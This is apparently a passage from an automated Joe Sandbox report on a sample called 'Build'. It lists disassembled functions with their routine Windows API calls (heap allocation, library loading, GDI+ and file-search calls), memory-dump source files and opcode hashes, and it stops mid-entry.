Function 00B53184 Relevance: 3.0, APIs: 2, Instructions: 33COMMON

Download Yara Rule

APIs

GetCurrentProcess.KERNEL32(?,?,00000002,00000002,?,00B531C7,00B4D526), ref: 00B53191
GetProcessAffinityMask.KERNEL32(00000000,?,00B531C7), ref: 00B53198

Memory Dump Source

Source File: 0000000D.00000002.1789902153.0000000000B41000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00B40000, based on PE: true

Associated: 0000000D.00000002.1789847048.0000000000B40000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 0000000D.00000002.1789958310.0000000000B76000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 0000000D.00000002.1790087674.0000000000B82000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 0000000D.00000002.1790087674.0000000000B89000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 0000000D.00000002.1790087674.0000000000BA2000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 0000000D.00000002.1790087674.0000000000BA6000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 0000000D.00000002.1790338324.0000000000BA7000.00000002.00000001.01000000.0000000E.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_b40000_Build.jbxd

Similarity

API ID: Process$AffinityCurrentMask
String ID:
API String ID: 1231390398-0
Opcode ID: c5c72f33371b149e2c10dcf49c2ad4c0a493740bc4d1b7d1570327f083412fe6
Instruction ID: 25841ec8f7cf3145e95df9cd362fc9b9218d19e1204497727ba2e59cd75670c1
Opcode Fuzzy Hash: c5c72f33371b149e2c10dcf49c2ad4c0a493740bc4d1b7d1570327f083412fe6
Instruction Fuzzy Hash: 0DE0D832F00905679F0987B49C15AEB73DDEA4468631440F9ED03F3300FD38DE0946A0

Function 00B528AB Relevance: 3.0, APIs: 2, Instructions: 33libraryCOMMON

Download Yara Rule

APIs

GetSystemDirectoryW.KERNEL32(?,00000800), ref: 00B528D4
LoadLibraryW.KERNELBASE(?,?,?,?,00000800,?,00B51309,Crypt32.dll,00000000,00B51383,00000200,?,00B51366,00000000,00000000,?), ref: 00B528F4

Memory Dump Source

Source File: 0000000D.00000002.1789902153.0000000000B41000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00B40000, based on PE: true

Associated: 0000000D.00000002.1789847048.0000000000B40000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 0000000D.00000002.1789958310.0000000000B76000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 0000000D.00000002.1790087674.0000000000B82000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 0000000D.00000002.1790087674.0000000000B89000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 0000000D.00000002.1790087674.0000000000BA2000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 0000000D.00000002.1790087674.0000000000BA6000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 0000000D.00000002.1790338324.0000000000BA7000.00000002.00000001.01000000.0000000E.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_b40000_Build.jbxd

Similarity

API ID: DirectoryLibraryLoadSystem
String ID:
API String ID: 1175261203-0
Opcode ID: 3e6219c323e4edf49dd73a82f4d59fd25a13d0b0785eb7cd4dcb1fb6202cfc9b
Instruction ID: 13e582050d6ef7f4955adeae1e0411f9b2be9c3e25e02dcfce70db238b935181
Opcode Fuzzy Hash: 3e6219c323e4edf49dd73a82f4d59fd25a13d0b0785eb7cd4dcb1fb6202cfc9b
Instruction Fuzzy Hash: 95F03075900158AACB10DF69DD45DDEB7ECEF49751F0004A5BA05D3100DA74EA858B64

Function 00B505C8 Relevance: 3.0, APIs: 2, Instructions: 31COMMON

Download Yara Rule

APIs

LoadStringW.USER32(00B47BEB,?,00B41436,00B47BEB), ref: 00B505F8
LoadStringW.USER32(00B47BEB,?,00B41436), ref: 00B5060F

Memory Dump Source

Source File: 0000000D.00000002.1789902153.0000000000B41000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00B40000, based on PE: true

Associated: 0000000D.00000002.1789847048.0000000000B40000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 0000000D.00000002.1789958310.0000000000B76000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 0000000D.00000002.1790087674.0000000000B82000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 0000000D.00000002.1790087674.0000000000B89000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 0000000D.00000002.1790087674.0000000000BA2000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 0000000D.00000002.1790087674.0000000000BA6000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 0000000D.00000002.1790338324.0000000000BA7000.00000002.00000001.01000000.0000000E.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_b40000_Build.jbxd

Similarity

API ID: LoadString
String ID:
API String ID: 2948472770-0
Opcode ID: d4f9279f60f26c66f50750a567a3e9b5d178544488933be8303b3e0c1254b4a8
Instruction ID: aa4c443b053df609fcde0bed31108898b8a67e47ec28ddbf721ef064cde00ebe
Opcode Fuzzy Hash: d4f9279f60f26c66f50750a567a3e9b5d178544488933be8303b3e0c1254b4a8
Instruction Fuzzy Hash: 23F09276114219FBDF212F51EC08DAB7FAAFF49395B1484A5FD0896131DA328960EBA0

Function 00B5CD3F Relevance: 3.0, APIs: 2, Instructions: 31comCOMMON

Download Yara Rule

APIs

GdiplusShutdown.GDIPLUS(?,?,?,?,00B7505D,000000FF), ref: 00B5CD7D
OleUninitialize.OLE32(?,?,?,?,00B7505D,000000FF), ref: 00B5CD82

Memory Dump Source

Source File: 0000000D.00000002.1789902153.0000000000B41000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00B40000, based on PE: true

Associated: 0000000D.00000002.1789847048.0000000000B40000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 0000000D.00000002.1789958310.0000000000B76000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 0000000D.00000002.1790087674.0000000000B82000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 0000000D.00000002.1790087674.0000000000B89000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 0000000D.00000002.1790087674.0000000000BA2000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 0000000D.00000002.1790087674.0000000000BA6000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 0000000D.00000002.1790338324.0000000000BA7000.00000002.00000001.01000000.0000000E.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_b40000_Build.jbxd

Similarity

API ID: GdiplusShutdownUninitialize
String ID:
API String ID: 3856339756-0
Opcode ID: 1e589e745b5b831620c1d5639d1bc5cad1a3546b9096bde0f669ace57b203afa
Instruction ID: 32fbb9eb0e67161b967226509f95c6333e027bf03272db10206bdbc2cc33f736
Opcode Fuzzy Hash: 1e589e745b5b831620c1d5639d1bc5cad1a3546b9096bde0f669ace57b203afa
Instruction Fuzzy Hash: 0DF05E76608A44EFC700DF19DC01F5AFBE8FB49B20F04426AE82AD3760DF34A841CA90

Function 00B5C34D Relevance: 3.0, APIs: 2, Instructions: 23windowCOMMON

Download Yara Rule

APIs

GdipCreateBitmapFromStreamICM.GDIPLUS(?,?), ref: 00B5C36E
GdipCreateBitmapFromStream.GDIPLUS(?,?), ref: 00B5C375

Memory Dump Source

Source File: 0000000D.00000002.1789902153.0000000000B41000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00B40000, based on PE: true

Associated: 0000000D.00000002.1789847048.0000000000B40000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 0000000D.00000002.1789958310.0000000000B76000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 0000000D.00000002.1790087674.0000000000B82000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 0000000D.00000002.1790087674.0000000000B89000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 0000000D.00000002.1790087674.0000000000BA2000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 0000000D.00000002.1790087674.0000000000BA6000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 0000000D.00000002.1790338324.0000000000BA7000.00000002.00000001.01000000.0000000E.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_b40000_Build.jbxd

Similarity

API ID: BitmapCreateFromGdipStream
String ID:
API String ID: 1918208029-0
Opcode ID: a91f5d9caf6b87c10d217b2fe13641d124abad950b08333d251330af88a6cba7
Instruction ID: 884345684ef87bce79d752227e233ac9c1609495b2157e6b2bb8bcfb39b05409
Opcode Fuzzy Hash: a91f5d9caf6b87c10d217b2fe13641d124abad950b08333d251330af88a6cba7
Instruction Fuzzy Hash: 52E06D71801208EFCB10DF99C440B99BBF8EB05311F20C09AE89693200D2B4AF449B90

Function 00B651AC Relevance: 3.0, APIs: 2, Instructions: 19COMMON

Download Yara Rule

APIs

___vcrt_FlsSetValue.LIBVCRUNTIME ref: 00B651CA
___vcrt_uninitialize_ptd.LIBVCRUNTIME ref: 00B651D5

Memory Dump Source

Source File: 0000000D.00000002.1789902153.0000000000B41000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00B40000, based on PE: true

Associated: 0000000D.00000002.1789847048.0000000000B40000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 0000000D.00000002.1789958310.0000000000B76000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 0000000D.00000002.1790087674.0000000000B82000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 0000000D.00000002.1790087674.0000000000B89000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 0000000D.00000002.1790087674.0000000000BA2000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 0000000D.00000002.1790087674.0000000000BA6000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 0000000D.00000002.1790338324.0000000000BA7000.00000002.00000001.01000000.0000000E.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_b40000_Build.jbxd

Similarity

API ID: Value___vcrt____vcrt_uninitialize_ptd
String ID:
API String ID: 1660781231-0
Opcode ID: 369ea9b1b320b3b018a9b0f8aac56f0f20295fba22b7af2b5999f1fdfb4aa861
Instruction ID: 249461a07fbcc30c129d9cca643cfa02efd09c6185174f3a85f2d69ba97f215d
Opcode Fuzzy Hash: 369ea9b1b320b3b018a9b0f8aac56f0f20295fba22b7af2b5999f1fdfb4aa861
Instruction Fuzzy Hash: 0FD0237554CF00448D3437752C1375E17C4D903770FF017C5E830A61E1DE1D88605511

Function 00B41341 Relevance: 3.0, APIs: 2, Instructions: 11COMMON

Download Yara Rule

APIs

GetDlgItem.USER32(?,?), ref: 00B41356
ShowWindow.USER32(00000000), ref: 00B4135D

Memory Dump Source

Source File: 0000000D.00000002.1789902153.0000000000B41000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00B40000, based on PE: true

Associated: 0000000D.00000002.1789847048.0000000000B40000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 0000000D.00000002.1789958310.0000000000B76000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 0000000D.00000002.1790087674.0000000000B82000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 0000000D.00000002.1790087674.0000000000B89000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 0000000D.00000002.1790087674.0000000000BA2000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 0000000D.00000002.1790087674.0000000000BA6000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 0000000D.00000002.1790338324.0000000000BA7000.00000002.00000001.01000000.0000000E.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_b40000_Build.jbxd

Similarity

API ID: ItemShowWindow
String ID:
API String ID: 3351165006-0
Opcode ID: 677bfb6ed48558a6132df93e4d0c57e60144bbfb9d82e0c8c605ff5008e141a2
Instruction ID: 900b385859aa84ddfaa3719ec45ba497dd0283f61e879b31f6912b54f82d428f
Opcode Fuzzy Hash: 677bfb6ed48558a6132df93e4d0c57e60144bbfb9d82e0c8c605ff5008e141a2
Instruction Fuzzy Hash: 90C0123219C200BECB010BB0DC0AC2ABBE8ABA6212F10CA48F1A6D2060CA39C010DB11

Function 00B41B63 Relevance: 1.8, APIs: 1, Instructions: 311COMMON

Download Yara Rule

APIs

__EH_prolog3.LIBCMT ref: 00B41B6A

Memory Dump Source

Source File: 0000000D.00000002.1789902153.0000000000B41000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00B40000, based on PE: true

Associated: 0000000D.00000002.1789847048.0000000000B40000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 0000000D.00000002.1789958310.0000000000B76000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 0000000D.00000002.1790087674.0000000000B82000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 0000000D.00000002.1790087674.0000000000B89000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 0000000D.00000002.1790087674.0000000000BA2000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 0000000D.00000002.1790087674.0000000000BA6000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 0000000D.00000002.1790338324.0000000000BA7000.00000002.00000001.01000000.0000000E.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_b40000_Build.jbxd

Similarity

API ID: H_prolog3
String ID:
API String ID: 431132790-0
Opcode ID: d2ace133ad7fa6f7a7c85a1220859fabb46f1ac572ab6ff677ebe37276cbdbe3
Instruction ID: d521551d5825fadc7088c1ef0ecef1e255297445427a20f32c8034ec19ea11b7
Opcode Fuzzy Hash: d2ace133ad7fa6f7a7c85a1220859fabb46f1ac572ab6ff677ebe37276cbdbe3
Instruction Fuzzy Hash: 46C15D74E442519BDF25CF28C8C47A97BE5EF06310F1809F9EC0A9F296CB259B84DB61

Function 00B4147C Relevance: 1.6, APIs: 1, Instructions: 100COMMON

Download Yara Rule

APIs

__EH_prolog3.LIBCMT ref: 00B41483

Part of subcall function 00B46AE8: __EH_prolog3.LIBCMT ref: 00B46AEF

Part of subcall function 00B4EE0F: __EH_prolog3.LIBCMT ref: 00B4EE16

Part of subcall function 00B4668F: __EH_prolog3.LIBCMT ref: 00B46696

Memory Dump Source

Source File: 0000000D.00000002.1789902153.0000000000B41000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00B40000, based on PE: true

Associated: 0000000D.00000002.1789847048.0000000000B40000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 0000000D.00000002.1789958310.0000000000B76000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 0000000D.00000002.1790087674.0000000000B82000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 0000000D.00000002.1790087674.0000000000B89000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 0000000D.00000002.1790087674.0000000000BA2000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 0000000D.00000002.1790087674.0000000000BA6000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 0000000D.00000002.1790338324.0000000000BA7000.00000002.00000001.01000000.0000000E.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_b40000_Build.jbxd

Similarity

API ID: H_prolog3
String ID:
API String ID: 431132790-0
Opcode ID: 5a2dce6c8921256055960bdaa3341da6cbc86b42f0330f863ae8514c4296434b
Instruction ID: 49b1bea53408d14333b60e23138e803655380032180bf8741b87177d75e2f849
Opcode Fuzzy Hash: 5a2dce6c8921256055960bdaa3341da6cbc86b42f0330f863ae8514c4296434b
Instruction Fuzzy Hash: 5E4113B1A063808ECB14DF2994802D97BE2AF69300F0845FEEC5DCF29AD7755354DBA2

Function 00B55617 Relevance: 1.6, APIs: 1, Instructions: 80COMMON

Download Yara Rule

APIs

__EH_prolog3.LIBCMT ref: 00B5561E

Memory Dump Source

Source File: 0000000D.00000002.1789902153.0000000000B41000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00B40000, based on PE: true

Associated: 0000000D.00000002.1789847048.0000000000B40000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 0000000D.00000002.1789958310.0000000000B76000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 0000000D.00000002.1790087674.0000000000B82000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 0000000D.00000002.1790087674.0000000000B89000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 0000000D.00000002.1790087674.0000000000BA2000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 0000000D.00000002.1790087674.0000000000BA6000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 0000000D.00000002.1790338324.0000000000BA7000.00000002.00000001.01000000.0000000E.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_b40000_Build.jbxd

Similarity

API ID: H_prolog3
String ID:
API String ID: 431132790-0
Opcode ID: 30791a8c43853acab491e36edc0df676754a7bcc0be0f830d4a7c3cb54866dad
Instruction ID: be8f877a314bcfe2f31abb14f57d3e61a88a9c38b9f74e2e926d159a983c2563
Opcode Fuzzy Hash: 30791a8c43853acab491e36edc0df676754a7bcc0be0f830d4a7c3cb54866dad
Instruction Fuzzy Hash: 532106B1E406119FDB24EFB8CC5175A76E8FF14305F0406FAE905EB292D7749940C7A8

Function 00B6D2E8 Relevance: 1.6, APIs: 1, Instructions: 65libraryloaderCOMMONLIBRARYCODE

Download Yara Rule

APIs

GetProcAddress.KERNEL32(00000000,?), ref: 00B6D348

Memory Dump Source

Source File: 0000000D.00000002.1789902153.0000000000B41000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00B40000, based on PE: true

Associated: 0000000D.00000002.1789847048.0000000000B40000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 0000000D.00000002.1789958310.0000000000B76000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 0000000D.00000002.1790087674.0000000000B82000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 0000000D.00000002.1790087674.0000000000B89000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 0000000D.00000002.1790087674.0000000000BA2000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 0000000D.00000002.1790087674.0000000000BA6000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 0000000D.00000002.1790338324.0000000000BA7000.00000002.00000001.01000000.0000000E.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_b40000_Build.jbxd

Similarity

API ID: AddressProc
String ID:
API String ID: 190572456-0
Opcode ID: 271e1a9137368c90dc9ea695fb7baa982e810bd0ca1c57383208dfb8fd66e6e2
Instruction ID: 8bddc2b26cb5e4c87900191b58a38462028b0c033fed40d794a33f90029bebc4
Opcode Fuzzy Hash: 271e1a9137368c90dc9ea695fb7baa982e810bd0ca1c57383208dfb8fd66e6e2
Instruction Fuzzy Hash: 9111C637F006259F9B259F2DEC8099A73E5EB8936071642A0FD25AB354DE34EC01C7D6

Function 00B6EAC9 Relevance: 1.6, APIs: 1, Instructions: 52COMMON

Download Yara Rule

APIs

Part of subcall function 00B6D786: RtlAllocateHeap.NTDLL(00000008,?,00000000,?,00B6B9D3,00000001,00000364,?,00B6688D,?,?,00B850C4), ref: 00B6D7C7

_free.LIBCMT ref: 00B6EB35

Memory Dump Source

Source File: 0000000D.00000002.1789902153.0000000000B41000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00B40000, based on PE: true

Associated: 0000000D.00000002.1789847048.0000000000B40000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 0000000D.00000002.1789958310.0000000000B76000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 0000000D.00000002.1790087674.0000000000B82000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 0000000D.00000002.1790087674.0000000000B89000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 0000000D.00000002.1790087674.0000000000BA2000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 0000000D.00000002.1790087674.0000000000BA6000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 0000000D.00000002.1790338324.0000000000BA7000.00000002.00000001.01000000.0000000E.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_b40000_Build.jbxd

Similarity

API ID: AllocateHeap_free
String ID:
API String ID: 614378929-0
Opcode ID: 7d30b6ea8507d2c13b34e354a80f4644266152c8881b27fa68bdf41323802f68
Instruction ID: 7d8b809abffa8848af1d9d2158e07c6af64aaa4a74bc982e38c2667f77d8b4ec
Opcode Fuzzy Hash: 7d30b6ea8507d2c13b34e354a80f4644266152c8881b27fa68bdf41323802f68
Instruction Fuzzy Hash: A5014576200345ABE321CF69C882D9AFBEDFB85330F25066DE19987280EA34A805C774

Function 00B4AB81 Relevance: 1.6, APIs: 1, Instructions: 51COMMON

Download Yara Rule

APIs

__EH_prolog3.LIBCMT ref: 00B4AB88

Memory Dump Source

Source File: 0000000D.00000002.1789902153.0000000000B41000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00B40000, based on PE: true

Associated: 0000000D.00000002.1789847048.0000000000B40000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 0000000D.00000002.1789958310.0000000000B76000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 0000000D.00000002.1790087674.0000000000B82000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 0000000D.00000002.1790087674.0000000000B89000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 0000000D.00000002.1790087674.0000000000BA2000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 0000000D.00000002.1790087674.0000000000BA6000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 0000000D.00000002.1790338324.0000000000BA7000.00000002.00000001.01000000.0000000E.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_b40000_Build.jbxd

Similarity

API ID: H_prolog3
String ID:
API String ID: 431132790-0
Opcode ID: 52a56834afb5fbc48b096e5f188e03fa6ed41b371219e1c0078a9c3dbe2a962f
Instruction ID: 4b01af93cdae98511238e6db2dd72a46f07ff3ce64ffcf219d2fd266785de28c
Opcode Fuzzy Hash: 52a56834afb5fbc48b096e5f188e03fa6ed41b371219e1c0078a9c3dbe2a962f
Instruction Fuzzy Hash: A0018436D4062A5BCB25EE68C8929BEB3F2EF44700B054599FD11AB341CB358E00A691

Function 00B6D786 Relevance: 1.5, APIs: 1, Instructions: 39memoryCOMMONLIBRARYCODE

Download Yara Rule

APIs

RtlAllocateHeap.NTDLL(00000008,?,00000000,?,00B6B9D3,00000001,00000364,?,00B6688D,?,?,00B850C4), ref: 00B6D7C7

Memory Dump Source

Source File: 0000000D.00000002.1789902153.0000000000B41000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00B40000, based on PE: true

Associated: 0000000D.00000002.1789847048.0000000000B40000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 0000000D.00000002.1789958310.0000000000B76000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 0000000D.00000002.1790087674.0000000000B82000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 0000000D.00000002.1790087674.0000000000B89000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 0000000D.00000002.1790087674.0000000000BA2000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 0000000D.00000002.1790087674.0000000000BA6000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 0000000D.00000002.1790338324.0000000000BA7000.00000002.00000001.01000000.0000000E.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_b40000_Build.jbxd

Similarity

API ID: AllocateHeap
String ID:
API String ID: 1279760036-0
Opcode ID: b249a1bb902dac0f51f8771dfba8fab95ee3e993e706bbf95c44a71e6c7947b2
Instruction ID: eaafea2719d31a3bc45a717b0365f2c959fdc822026c0203376a7678e6b11caa
Opcode Fuzzy Hash: b249a1bb902dac0f51f8771dfba8fab95ee3e993e706bbf95c44a71e6c7947b2
Instruction Fuzzy Hash: A9F0B431B4262466DB216F629C41B7B77D8DF417A0F1441D1E808D6595CE28DD4086E3

Function 00B6BC8E Relevance: 1.5, APIs: 1, Instructions: 32memoryCOMMONLIBRARYCODE

Download Yara Rule

APIs

RtlAllocateHeap.NTDLL(00000000,?,?,?,00B66A24,?,0000015D,?,?,?,?,00B67F00,000000FF,00000000,?,?), ref: 00B6BCC0

Memory Dump Source

Source File: 0000000D.00000002.1789902153.0000000000B41000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00B40000, based on PE: true

Associated: 0000000D.00000002.1789847048.0000000000B40000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 0000000D.00000002.1789958310.0000000000B76000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 0000000D.00000002.1790087674.0000000000B82000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 0000000D.00000002.1790087674.0000000000B89000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 0000000D.00000002.1790087674.0000000000BA2000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 0000000D.00000002.1790087674.0000000000BA6000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 0000000D.00000002.1790338324.0000000000BA7000.00000002.00000001.01000000.0000000E.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_b40000_Build.jbxd

Similarity

API ID: AllocateHeap
String ID:
API String ID: 1279760036-0
Opcode ID: 2e7c7a637dd7a9078a42a9bff2238d14d302d08d013be92ab6c0e725e2eca704
Instruction ID: fcc9cde807fd4b861d4f3b73dae8c5f2cc1fbbc048e180df20c502ea1a18d391
Opcode Fuzzy Hash: 2e7c7a637dd7a9078a42a9bff2238d14d302d08d013be92ab6c0e725e2eca704
Instruction Fuzzy Hash: 04E06D3520162256DB3137659C41F5B3AE8DF517A0F1901A2AC05E62A2CF6DDEC186E5

Function 00B4AFD0 Relevance: 1.5, APIs: 1, Instructions: 30COMMON

Download Yara Rule

APIs

FindCloseChangeNotification.KERNELBASE(?,?,?,00B4AF75,CEEE5757,00000000,00B7517A,000000FF,?,00B48882,?,?), ref: 00B4AFEB

Memory Dump Source

Source File: 0000000D.00000002.1789902153.0000000000B41000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00B40000, based on PE: true

Associated: 0000000D.00000002.1789847048.0000000000B40000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 0000000D.00000002.1789958310.0000000000B76000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 0000000D.00000002.1790087674.0000000000B82000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 0000000D.00000002.1790087674.0000000000B89000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 0000000D.00000002.1790087674.0000000000BA2000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 0000000D.00000002.1790087674.0000000000BA6000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 0000000D.00000002.1790338324.0000000000BA7000.00000002.00000001.01000000.0000000E.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_b40000_Build.jbxd

Similarity

API ID: ChangeCloseFindNotification
String ID:
API String ID: 2591292051-0
Opcode ID: 6b24954f09cd1fd19113812dfbdae13006c97a04516ec3f85deaf4f1b3cccac2
Instruction ID: 84035c74c077c656af326dd8128fad9a57073dcb1039b14824d759964da35196
Opcode Fuzzy Hash: 6b24954f09cd1fd19113812dfbdae13006c97a04516ec3f85deaf4f1b3cccac2
Instruction Fuzzy Hash: 2EF0BE710C2B028EDB349A20C458B92B3E4EB12326F041B9ED0E3839E0D761AA8DE641

Function 00B4C37A Relevance: 1.5, APIs: 1, Instructions: 27COMMON

Download Yara Rule

APIs

Part of subcall function 00B4C4A8: FindFirstFileW.KERNELBASE(?,?,00000000,?,?,?,00B4C39F,000000FF,?,?,?,?,00B487BC,?,?,00000000), ref: 00B4C4E6
Part of subcall function 00B4C4A8: FindFirstFileW.KERNELBASE(?,00000000,?,?,00000800,?,?,00B4C39F,000000FF,?,?,?,?,00B487BC,?,?), ref: 00B4C516
Part of subcall function 00B4C4A8: GetLastError.KERNEL32(?,?,00000800,?,?,00B4C39F,000000FF,?,?,?,?,00B487BC,?,?,00000000,0000003A), ref: 00B4C522

FindClose.KERNELBASE(00000000,000000FF,?,?,?,?,00B487BC,?,?,00000000,0000003A,?,0000003A,00000802), ref: 00B4C3A5

Memory Dump Source

Source File: 0000000D.00000002.1789902153.0000000000B41000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00B40000, based on PE: true

Associated: 0000000D.00000002.1789847048.0000000000B40000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 0000000D.00000002.1789958310.0000000000B76000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 0000000D.00000002.1790087674.0000000000B82000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 0000000D.00000002.1790087674.0000000000B89000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 0000000D.00000002.1790087674.0000000000BA2000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 0000000D.00000002.1790087674.0000000000BA6000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 0000000D.00000002.1790338324.0000000000BA7000.00000002.00000001.01000000.0000000E.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_b40000_Build.jbxd

Similarity

